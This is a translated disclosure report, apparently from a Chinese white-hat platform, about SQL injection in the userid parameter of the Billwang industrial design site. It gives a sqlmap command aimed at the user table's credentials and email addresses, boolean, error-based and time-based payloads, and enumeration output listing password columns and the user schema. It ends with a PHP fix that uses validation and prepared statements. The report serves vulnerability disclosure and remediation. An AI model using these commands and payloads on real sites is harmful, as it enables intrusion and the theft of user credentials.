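2015-11-05: Details reported to the vendor; awaiting vendor handling
2015-11-09: Vendor confirmed; details disclosed to the vendor only
2015-11-19: Details disclosed to core white hats and experts in related fields
2015-11-29: Details disclosed to regular white hats
2015-12-09: Details disclosed to trainee white hats
2015-12-24: Details disclosed to the public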
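Billwang Industrial Design Network (http://www.Billwang.net) is an internet media platform for the creative design industry, centered on industrial design. The site currently has more than 350,000 designer members and over a thousand member companies in design and product manufacturing. Its members include students, teachers, managers at well-known companies and industrial design practitioners from mainland China, Taiwan and related institutions abroad. Billwang was founded in September 2000. After nearly 11 years of development, it has grown from the original "design forum" into one of the interactive online media outlets with the most online users in the domestic design industry. The site has built four specialist channels (news, knowledge, recruitment and portfolios) that provide designers, design companies and product manufacturers with professional information distribution, technical exchange, resource sharing and recruitment services. As a well-known media platform in the domestic industrial design industry, Billwang has attracted industry leaders, scholars and a professional audience devoted to industrial design. It is also one of the designated partner websites of the China Industrial Design Association and the Industrial Design Branch of the Mechanical Engineering Society, and has established close cooperation with well-known domestic design companies and nearly 40 design colleges. We are committed to building a creative design e-commerce platform serving Chinese design, giving teachers and students at design schools, design practitioners and companies an internet platform for exchanging and sharing design resources, publishing and promoting design events, and exhibiting and trading creative and design work.
URL: http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059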
python sqlmap.py -u "http://**.**.**.**/?act=viewpro&do=companyjobs&userid=4059" --random-agent -p userid --technique=BET --batch -D designbw -T bwduser -C username,password,qq,email --count
back-end DBMS: MySQL 5.0
Database: designbw
+---------+---------+
| Table   | Entries |
+---------+---------+
| bwduser | 431166  |
+---------+---------+
---
Parameter: userid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT 7191 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7191=7191,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=viewpro&do=companyjobs&userid=4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)
---
web application technology: PHP 5.2.13
back-end DBMS: MySQL 5.0
current user: '[email protected].%'
current user is DBA: False

database management system users [1]:
[*] 'design'@'192.168.168.%'

columns LIKE 'pass' were found in the following databases:
Database: designbw
Table: bwduser
[2 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| password     | char(32) |
| passworddate | date     |
+--------------+----------+

Database: designbw
Table: bwdforum
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+

Database: designbw
Table: bwdusergroup
[2 columns]
+-----------------+----------------------+
| Column          | Type                 |
+-----------------+----------------------+
| passwordexpires | smallint(5) unsigned |
| passwordhistory | smallint(5) unsigned |
+-----------------+----------------------+

Database: designbw
Table: bwdpasswordhistory
[2 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(50) |
| passworddate | date        |
+--------------+-------------+

Database: designbw
Table: bwdsession
[1 column]
+--------+------------+
| Column | Type       |
+--------+------------+
| bypass | tinyint(4) |
+--------+------------+

Database: wordpress
Table: wp_users
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_pass | varchar(64) |
+-----------+-------------+

Database: wordpress
Table: wp_posts
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| post_password | varchar(20) |
+---------------+-------------+

Database: new_shop
Table: cdb_uc_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+

Database: new_shop
Table: cdb_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+

Database: new_shop
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| passwd_answer   | varchar(255) |
| passwd_question | varchar(50)  |
| password        | varchar(32)  |
+-----------------+--------------+

Database: new_shop
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+

Database: new_shop
Table: cdb_forumfields
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+

Database: new_shop
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+

Database: new_shop
Table: uc_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+

Database: new_shop
Table: partner
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: designbw
Table: bwduser
[75 columns]
+------------------------------+-------------------------------------------------+
| Column                       | Type                                            |
+------------------------------+-------------------------------------------------+
| adminoptions                 | int(10) unsigned                                |
| aim                          | char(20)                                        |
| autosubscribe                | smallint(6)                                     |
| avatarid                     | smallint(6)                                     |
| avatarrevision               | int(10) unsigned                                |
| birthday                     | char(10)                                        |
| birthday_search              | date                                            |
| credit                       | int(10)                                         |
| customtitle                  | smallint(6)                                     |
| daysprune                    | smallint(6)                                     |
| displaygroupid               | smallint(5) unsigned                            |
| email                        | char(100)                                       |
| emailstamp                   | int(10) unsigned                                |
| forum_answers                | int(10) unsigned                                |
| friendcount                  | int(10) unsigned                                |
| friendreqcount               | int(10) unsigned                                |
| gmmoderatedcount             | int(10) unsigned                                |
| homepage                     | char(100)                                       |
| icq                          | char(20)                                        |
| infractiongroupid            | smallint(5) unsigned                            |
| infractiongroupids           | varchar(255)                                    |
| infractions                  | int(10) unsigned                                |
| ipaddress                    | char(15)                                        |
| ipoints                      | int(10) unsigned                                |
| joindate                     | int(10) unsigned                                |
| languageid                   | smallint(5) unsigned                            |
| lastactivity                 | int(10) unsigned                                |
| lastpost                     | int(10) unsigned                                |
| lastpostid                   | int(10) unsigned                                |
| lastvisit                    | int(10) unsigned                                |
| maxposts                     | smallint(6)                                     |
| membergroupids               | char(250)                                       |
| msn                          | char(100)                                       |
| ncode_imageresizer_maxheight | smallint(5) unsigned                            |
| ncode_imageresizer_maxwidth  | smallint(5) unsigned                            |
| ncode_imageresizer_mode      | enum('none','enlarge','samewindow','newwindow') |
| options                      | int(10) unsigned                                |
| parentemail                  | char(50)                                        |
| password                     | char(32)                                        |
| passworddate                 | date                                            |
| pcmoderatedcount             | int(10) unsigned                                |
| pcunreadcount                | int(10) unsigned                                |
| pmpopup                      | smallint(6)                                     |
| pmtotal                      | smallint(5) unsigned                            |
| pmunread                     | smallint(5) unsigned                            |
| post_thanks_thanked_posts    | int(10) unsigned                                |
| post_thanks_thanked_times    | int(10) unsigned                                |
| post_thanks_user_amount      | int(10) unsigned                                |
| posts                        | int(10) unsigned                                |
| profilepicrevision           | int(10) unsigned                                |
| profilevisits                | int(10) unsigned                                |
| qq                           | char(20)                                        |
| referrerid                   | int(10) unsigned                                |
| reputation                   | int(11)                                         |
| reputationlevelid            | int(10) unsigned                                |
| salt                         | char(3)                                         |
| showbirthday                 | smallint(5) unsigned                            |
| showvbcode                   | smallint(5) unsigned                            |
| sigpicrevision               | int(10) unsigned                                |
| skype                        | char(32)                                        |
| socgroupinvitecount          | int(10) unsigned                                |
| socgroupreqcount             | int(10) unsigned                                |
| startofweek                  | smallint(6)                                     |
| styleid                      | smallint(5) unsigned                            |
| threadedmode                 | smallint(5) unsigned                            |
| timezoneoffset               | char(4)                                         |
| usergroupid                  | smallint(5) unsigned                            |
| userid                       | int(10) unsigned                                |
| username                     | varchar(100)                                    |
| usertitle                    | char(250)                                       |
| utscore                      | int(11)                                         |
| vmmoderatedcount             | int(10) unsigned                                |
| vmunreadcount                | int(10) unsigned                                |
| warnings                     | int(10) unsigned                                |
| yahoo                        | char(32)                                        |
+------------------------------+-------------------------------------------------+
Stopping here; not going any deeper.
Add filtering.
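One way to apply the filtering recommended for the `userid` GET parameter, shown as an added example that is not the site's code: strict integer validation followed by a bound placeholder. The handler name, the `company_jobs` table and its columns are hypothetical, and an in-memory SQLite database stands in for the site's MySQL so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical handler for ?act=viewpro&do=companyjobs&userid=N.
// Table company_jobs and its columns are assumptions, not the site's schema.

/** Accept only a decimal id in the int(10) unsigned range; null otherwise. */
function parse_userid($raw): ?int
{
    // Arrays (userid[]=1), signs, spaces, hex and trailing SQL all fail here.
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,9}\z/', $raw)) {
        return null;
    }
    $id = (int) $raw; // assumes 64-bit PHP
    return $id <= 4294967295 ? $id : null;
}

function company_jobs(PDO $db, $rawUserId): array
{
    $userId = parse_userid($rawUserId);
    if ($userId === null) {
        return ['status' => 400, 'rows' => []];
    }
    // Bound placeholder: the value never becomes part of the SQL text.
    // With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false.
    $stmt = $db->prepare('SELECT title FROM company_jobs WHERE userid = :userid');
    $stmt->bindValue(':userid', $userId, PDO::PARAM_INT);
    $stmt->execute();
    return ['status' => 200, 'rows' => $stmt->fetchAll(PDO::FETCH_COLUMN)];
}

// Constructed in-memory SQLite data so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE company_jobs (userid INTEGER, title TEXT)');
$db->exec("INSERT INTO company_jobs VALUES (4059, 'Industrial designer')");

// First value is legitimate; the next two are userid values from the report.
$inputs = [
    '4059',
    '4059 RLIKE (SELECT (CASE WHEN (2872=2872) THEN 4059 ELSE 0x28 END))',
    '4059 AND (SELECT * FROM (SELECT(SLEEP(5)))vLak)',
    ['4059'],
];
foreach ($inputs as $in) {
    $res = company_jobs($db, $in);
    printf("%d %d row(s) %s\n", $res['status'], count($res['rows']), json_encode($in));
}
```

Only the first input reaches the database; the others are rejected with status 400 before any query is built.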
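Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-11-09 11:05
No direct handling channel with the organization that manages the website has been established yet; awaiting claim.
None at this time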